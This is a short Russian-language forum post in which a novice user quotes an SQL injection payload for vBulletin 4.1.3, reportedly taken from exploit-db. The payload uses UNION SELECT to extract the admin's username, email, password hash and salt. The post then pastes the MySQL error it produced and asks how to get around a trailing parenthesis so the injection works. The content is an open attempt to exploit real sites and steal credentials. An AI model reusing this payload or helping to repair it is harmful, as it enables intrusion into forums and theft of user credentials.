
13.03.2012, 12:38
|
|
Новичок
Регистрация: 14.07.2011
Сообщений: 10
С нами:
7805846
Репутация:
0
|
|
Нашел эксплоит на exploit-db.com для Vbulletin 4.1.3
Код:
&messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1
а DB мне в ответ вот так:
Код:
Invalid SQL:
SELECT socialgroup.name
FROM socialgroup AS socialgroup
WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1);
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3
Вопрос: как победить эту долбаную скобку в конце?
|
|
|